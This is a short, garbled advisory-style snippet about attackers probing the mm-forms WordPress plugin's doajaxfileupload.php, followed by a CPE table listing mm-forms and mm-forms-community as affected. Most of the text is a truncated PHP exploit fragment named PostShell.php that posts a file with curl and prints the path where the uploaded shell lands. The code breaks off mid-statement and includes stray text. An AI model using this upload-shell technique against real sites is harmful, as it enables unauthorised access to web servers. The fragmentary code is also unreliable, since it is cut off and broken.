Attackers have been seen probing for the “/wp-content/plugins/mm-forms/includes/doajaxfileupload.php” file.
PostShell.php “@$uploadfile”)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print “$postResult”; ?> Shell Access : http://www.example.com/wp-content/plugins/mm-forms-community/upload/temp/ Filename : $postResult output lo.php:
CPE | Name | Operator | Version |
---|---|---|---|
mm-forms-community | eq | * | |
mm-forms | eq | * |